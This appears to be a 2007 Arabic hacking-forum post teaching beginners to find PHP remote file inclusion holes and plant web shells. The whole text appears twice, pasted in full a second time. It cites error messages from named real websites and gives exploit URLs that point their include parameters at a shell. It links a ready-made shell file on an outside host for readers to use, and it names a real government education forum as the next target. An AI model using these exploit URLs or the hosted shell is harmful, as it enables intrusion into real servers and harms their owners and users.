رسمي والقمر باسمي
10-17-2007, 03:00 AM
دروس للمبتدئين في طريقة استغلال ثغرات المتصفح ورفع شل
انا قررت احط دروس من البداية للمبتدئين لأني صراحة لاحظت انهم مايعرفون اكثر الثغرات وطريقة استغلالها وعدم التعامل مع الشل وماهو الشل اصلا
وانشاء الله تكون الشروحات سهلة وواضحة
اولآ: ثغرة File include
(ما هو الإنكلود)
الإنكلود هي داله بال بي أتش بي وهذي الداله تعتبر سلاح ذو حدين يعني حالها حال أي داله ممكن تودي السكربت أو الموقع في داهية بسبب خطأ بسيط
(ماهي عملها)
بأختصارثغرة الإنكلود طريقتها هي بأنك تسحب ملف من خارج الموقع المصاب وتشغيله داخل الموقع المصاب,, وهذا شيء جميل
(إذا ظهر لي خطأ كيف أعرف هذا ثغرة إنكلود أو خطأ برمجي )
مثال:-
شوفوا هذي الصفحه إلي راح نشرح عليها عملي
اضغطThE-WoLf هنـــــــا
راح يطلع لنا هذا الكلام:-
Warning: main(./includes/constants.php): failed to open stream: No such file or directory in /usr/home/boe41/public_html/phpBB2/common.php on line 187
Warning: main(): Failed opening './includes/constants.php' for inclusion (include_path='.:/usr/local/share/pear') in /usr/home/boe41/public_html/phpBB2/common.php on line 187
يمكن بعض الناس لما يشوف هذا الكلام يحسب إنه فيه ثغرة إنكلود لكن لو يلاحظ إنه محددين ملف معين عشان ينعمله إنكلود ومعناة هذا الكلام إن هذا خطأ برمجي لا أكثر ولا أقل
عرفنا إن المبرمج حدد ملف معين من : main(./includes/constants.php)
عنوان الملف إلي فيه الخطأ البرمجي : /usr/home/boe41/public_html/phpBB2/common.php
ورقم السطر : 187
مثال آخر:-
شوفوا هذي الصفحه إلي راح نشرح عليها عملي ايضآ :
اضغطThE-WoLfهنــــــــا
شف الكلام هذا :
Warning: main(deities/the-wolf-ksa/****.txt): failed to open stream: No such file or directory in /home/.elanna/chocolate/chocolatedeities.com/deityl.php on line 26
Warning: main(deities/the-wolf-ksa/****.txt): failed to open stream: No such file or directory in /home/.elanna/chocolate/chocolatedeities.com/deityl.php on line 26
Warning: main(): Failed opening 'deities/the-wolf-ksa/****.txt' for inclusion (include_path='.:/usr/local/lib/php') in /home/.elanna/chocolate/chocolatedeities.com/deityl.php on line 26
فيصبح ببالك على طول إن هذا ثغره ولكن المفروض إنك تشوف أول وش صار فنالحظ إنه حدد ملف الإنكلود
وهذا الشيء تلقاه هنا : (deities/the-wolf-ksa/****.txt)
راح تقول أنا كتبت بالعنوان deityl.php?deity=the-wolf-ksa
فطلع لي إسم الملف نفس إلي طلع بالملف يعني أنا كتبت بالعنوان the-wolf-ksa
وطلع لي بالخطأ (main(deities/the-wolf-ksa/****.txt ولما أغير إلي بالعنوان يتغير إهني فنستنتج إنه حط هذا المتغير إهو إسم الملف يعني كل ما تغيره يتغير الملف فيطلع خطأ يقول إن الملف مو موجود وهذا هو الخطأ J ومعناه إن هذي المبرمج مغلق الثغره
وهذا الخطء بملف : /home/.elanna/chocolate/chocolatedeities.com/deityl.php
بالسطر : 26
(هذي المعلومات كلها تلقاها بالخطأ نفسه)
مثال آخر :-
شوفوا هذي الصفحه إلي راح نشرح عليها عملي:
اضغط ThE-WoLfهنـــــــا
راح يطلع لنا هذا الكلام فوق:-
Warning: main(left.php): failed to open stream: No such file or directory in /home/minhajs/public_html/urdu/mwf/index.php on line 38
Warning: main(left.php): failed to open stream: No such file or directory in /home/minhajs/public_html/urdu/mwf/index.php on line 38
Warning: main(): Failed opening 'left.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/minhajs/public_html/urdu/mwf/index.php on line 38
لما تشوف هذا المثال ممكن تقول إن هذي ثغره لأنه ما حدد ملف معين لكن لو تلاحظ إنه ما حط متغير ممكن من خلاله نسوي إنكلود يعني هو مسوي كل شي بالسورس فما يطلع لنا متغير ممكن من خلاله إن نسوي إنكلود حق شل فهذي ما تعتبر ثغره أيضاً
راح تقول أجل وش هي الثغره كل ما شفت شي قلت هذي مب ثغره أقولك شوف المثالين الجاين
شوفو هذي الصفحة الي راح نشرح عليها عملي :
اضغطThE-WoLfهنــــــا
راح يطلعلك هالكلام
Warning: include(the-wolf-ksa.php) [function.include]: failed to open stream: No such file or directory in D:\WWW\47th.dk\index.php on line 144
Warning: include() [function.include]: Failed opening 'the-wolf-ksa.php' for inclusion (include_path='.;C:\php5\pear') in D:\WWW\47th.dk\index.php on line 144
لو تركز على اخر الرابط في العنوان index.php?sec=the-wolf-ksa
وتشوف الملف الي محددة البرمج تلقاة(include (the-wolf-ksa.php
وهذا يعني إن المبرمج مو محدد ملف معين للإنكلود وهذا يعني إنها ثغره والإستغلال يكون بهذي الطريقه
http://47th.dk/index.php?sec=shill.txt
بعد علامة اليساوي فوق تحط رابط شل بأمتداد txt
وبهذا تكون اكتشفت ثغرة إنكلود بالموقع ورفعت علية شل
طيب نشوف مثال ثاني:
اضغطThE-WoLfهنــــــــــــــــا
راح يطلع لنا هذا الكلام:
Warning: main(the-wolf-ksa): failed to open stream: No such file or directory in /Volumes/Storage/Faculty/step/Sites/index.php on line 33
Warning: main(): Failed opening 'the-wolf-ksa' for inclusion (include_path='.:/usr/lib/php') in /Volumes/Storage/Faculty/step/Sites/index.php on line 33
حلو دام طلع إنه مو محدد ملف معين وإلي طلع نفس إلي بالعنوان
لو تركز على العنوان index.php?url=the-wolf-ksa
وتشوف الملف الي محددة البرمج (main(the-wolf-ksa
وهذا يعني إن المبرمج مو محدد ملف معين للإنكلود وهذا يعني إنها ثغره والإستغلال يكون بهذي الطريقه
http://www.sttheresaschool.org/~step...?url=shill.txt
بعد علامة اليساوي حط رابط شل بأمتداد txt
وأخيرآ طريقة استغلال مثل هذي الثغرات:
طريقة إستغلال الثغرة هي عن طريق رفع ملف الشل على موقع آخر ولك بحيث إنك تحط الإمتداد .txt أو أي إمتداد غير html و php
وهذا رابط جبناة لكم مرفوع على مركز القراصنة وريحناكم انسخة وطبق الدرس الي فوق
http://www.xp10.com/xp10up/xp10/mahmood.txt?
راح تسألني ليش أقولك ليش
لأنك لو رفعته بإمتداد php وسويتله إنكلود على موقع ثاني راح يفسره السيرفر إلي مرفوع عليه الملف والموقع إلي مسويله إنكلود بس بياخذ له شكل يعني شل من دون فايده فإحنا نرفع بإمتداد txt عشان السيرفر إلي مسويله إنكلود هو إلي يفسر الشل فيشتغل كنه مرفوع عليه.
ملاحظة: لاتنسى الاستفهام الي في اخر الرابط بعد رابط الشل بعضهم يقول الشل ماشتغل وهو مايدري انة نسى مايحط الاستفهام.
واتمنى اني اكون قد وفقت في شرح الغموض الموجود في هذي الثغرة ونشوفكم في الدرس القادم
تحياتي لكم
فارس هكر
=======================================
الدرس الثاني راح يكون
تشفير لوحة التحكم
هع هع هع
وراح نبداء في هذاا المووقع
http://www.riyadhedu.gov.sa/vb/modcp/index.php
==========================================
انا قررت احط دروس من البداية للمبتدئين لأني صراحة لاحظت انهم مايعرفون اكثر الثغرات وطريقة استغلالها وعدم التعامل مع الشل وماهو الشل اصلا
وانشاء الله تكون الشروحات سهلة وواضحة
اولآ: ثغرة File include
(ما هو الإنكلود)
الإنكلود هي داله بال بي أتش بي وهذي الداله تعتبر سلاح ذو حدين يعني حالها حال أي داله ممكن تودي السكربت أو الموقع في داهية بسبب خطأ بسيط
(ماهي عملها)
بأختصارثغرة الإنكلود طريقتها هي بأنك تسحب ملف من خارج الموقع المصاب وتشغيله داخل الموقع المصاب,, وهذا شيء جميل
(إذا ظهر لي خطأ كيف أعرف هذا ثغرة إنكلود أو خطأ برمجي )
مثال:-
شوفوا هذي الصفحه إلي راح نشرح عليها عملي
اضغطThE-WoLf هنـــــــا
راح يطلع لنا هذا الكلام:-
Warning: main(./includes/constants.php): failed to open stream: No such file or directory in /usr/home/boe41/public_html/phpBB2/common.php on line 187
Warning: main(): Failed opening './includes/constants.php' for inclusion (include_path='.:/usr/local/share/pear') in /usr/home/boe41/public_html/phpBB2/common.php on line 187
يمكن بعض الناس لما يشوف هذا الكلام يحسب إنه فيه ثغرة إنكلود لكن لو يلاحظ إنه محددين ملف معين عشان ينعمله إنكلود ومعناة هذا الكلام إن هذا خطأ برمجي لا أكثر ولا أقل
عرفنا إن المبرمج حدد ملف معين من : main(./includes/constants.php)
عنوان الملف إلي فيه الخطأ البرمجي : /usr/home/boe41/public_html/phpBB2/common.php
ورقم السطر : 187
مثال آخر:-
شوفوا هذي الصفحه إلي راح نشرح عليها عملي ايضآ :
اضغطThE-WoLfهنــــــــا
شف الكلام هذا :
Warning: main(deities/the-wolf-ksa/****.txt): failed to open stream: No such file or directory in /home/.elanna/chocolate/chocolatedeities.com/deityl.php on line 26
Warning: main(deities/the-wolf-ksa/****.txt): failed to open stream: No such file or directory in /home/.elanna/chocolate/chocolatedeities.com/deityl.php on line 26
Warning: main(): Failed opening 'deities/the-wolf-ksa/****.txt' for inclusion (include_path='.:/usr/local/lib/php') in /home/.elanna/chocolate/chocolatedeities.com/deityl.php on line 26
فيصبح ببالك على طول إن هذا ثغره ولكن المفروض إنك تشوف أول وش صار فنالحظ إنه حدد ملف الإنكلود
وهذا الشيء تلقاه هنا : (deities/the-wolf-ksa/****.txt)
راح تقول أنا كتبت بالعنوان deityl.php?deity=the-wolf-ksa
فطلع لي إسم الملف نفس إلي طلع بالملف يعني أنا كتبت بالعنوان the-wolf-ksa
وطلع لي بالخطأ (main(deities/the-wolf-ksa/****.txt ولما أغير إلي بالعنوان يتغير إهني فنستنتج إنه حط هذا المتغير إهو إسم الملف يعني كل ما تغيره يتغير الملف فيطلع خطأ يقول إن الملف مو موجود وهذا هو الخطأ J ومعناه إن هذي المبرمج مغلق الثغره
وهذا الخطء بملف : /home/.elanna/chocolate/chocolatedeities.com/deityl.php
بالسطر : 26
(هذي المعلومات كلها تلقاها بالخطأ نفسه)
مثال آخر :-
شوفوا هذي الصفحه إلي راح نشرح عليها عملي:
اضغط ThE-WoLfهنـــــــا
راح يطلع لنا هذا الكلام فوق:-
Warning: main(left.php): failed to open stream: No such file or directory in /home/minhajs/public_html/urdu/mwf/index.php on line 38
Warning: main(left.php): failed to open stream: No such file or directory in /home/minhajs/public_html/urdu/mwf/index.php on line 38
Warning: main(): Failed opening 'left.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/minhajs/public_html/urdu/mwf/index.php on line 38
لما تشوف هذا المثال ممكن تقول إن هذي ثغره لأنه ما حدد ملف معين لكن لو تلاحظ إنه ما حط متغير ممكن من خلاله نسوي إنكلود يعني هو مسوي كل شي بالسورس فما يطلع لنا متغير ممكن من خلاله إن نسوي إنكلود حق شل فهذي ما تعتبر ثغره أيضاً
راح تقول أجل وش هي الثغره كل ما شفت شي قلت هذي مب ثغره أقولك شوف المثالين الجاين
شوفو هذي الصفحة الي راح نشرح عليها عملي :
اضغطThE-WoLfهنــــــا
راح يطلعلك هالكلام
Warning: include(the-wolf-ksa.php) [function.include]: failed to open stream: No such file or directory in D:\WWW\47th.dk\index.php on line 144
Warning: include() [function.include]: Failed opening 'the-wolf-ksa.php' for inclusion (include_path='.;C:\php5\pear') in D:\WWW\47th.dk\index.php on line 144
لو تركز على اخر الرابط في العنوان index.php?sec=the-wolf-ksa
وتشوف الملف الي محددة البرمج تلقاة(include (the-wolf-ksa.php
وهذا يعني إن المبرمج مو محدد ملف معين للإنكلود وهذا يعني إنها ثغره والإستغلال يكون بهذي الطريقه
http://47th.dk/index.php?sec=shill.txt
بعد علامة اليساوي فوق تحط رابط شل بأمتداد txt
وبهذا تكون اكتشفت ثغرة إنكلود بالموقع ورفعت علية شل
طيب نشوف مثال ثاني:
اضغطThE-WoLfهنــــــــــــــــا
راح يطلع لنا هذا الكلام:
Warning: main(the-wolf-ksa): failed to open stream: No such file or directory in /Volumes/Storage/Faculty/step/Sites/index.php on line 33
Warning: main(): Failed opening 'the-wolf-ksa' for inclusion (include_path='.:/usr/lib/php') in /Volumes/Storage/Faculty/step/Sites/index.php on line 33
حلو دام طلع إنه مو محدد ملف معين وإلي طلع نفس إلي بالعنوان
لو تركز على العنوان index.php?url=the-wolf-ksa
وتشوف الملف الي محددة البرمج (main(the-wolf-ksa
وهذا يعني إن المبرمج مو محدد ملف معين للإنكلود وهذا يعني إنها ثغره والإستغلال يكون بهذي الطريقه
http://www.sttheresaschool.org/~step...?url=shill.txt
بعد علامة اليساوي حط رابط شل بأمتداد txt
وأخيرآ طريقة استغلال مثل هذي الثغرات:
طريقة إستغلال الثغرة هي عن طريق رفع ملف الشل على موقع آخر ولك بحيث إنك تحط الإمتداد .txt أو أي إمتداد غير html و php
وهذا رابط جبناة لكم مرفوع على مركز القراصنة وريحناكم انسخة وطبق الدرس الي فوق
http://www.xp10.com/xp10up/xp10/mahmood.txt?
راح تسألني ليش أقولك ليش
لأنك لو رفعته بإمتداد php وسويتله إنكلود على موقع ثاني راح يفسره السيرفر إلي مرفوع عليه الملف والموقع إلي مسويله إنكلود بس بياخذ له شكل يعني شل من دون فايده فإحنا نرفع بإمتداد txt عشان السيرفر إلي مسويله إنكلود هو إلي يفسر الشل فيشتغل كنه مرفوع عليه.
ملاحظة: لاتنسى الاستفهام الي في اخر الرابط بعد رابط الشل بعضهم يقول الشل ماشتغل وهو مايدري انة نسى مايحط الاستفهام.
واتمنى اني اكون قد وفقت في شرح الغموض الموجود في هذي الثغرة ونشوفكم في الدرس القادم
تحياتي لكم
فارس هكر
=======================================
الدرس الثاني راح يكون
تشفير لوحة التحكم
هع هع هع
وراح نبداء في هذاا المووقع
http://www.riyadhedu.gov.sa/vb/modcp/index.php
==========================================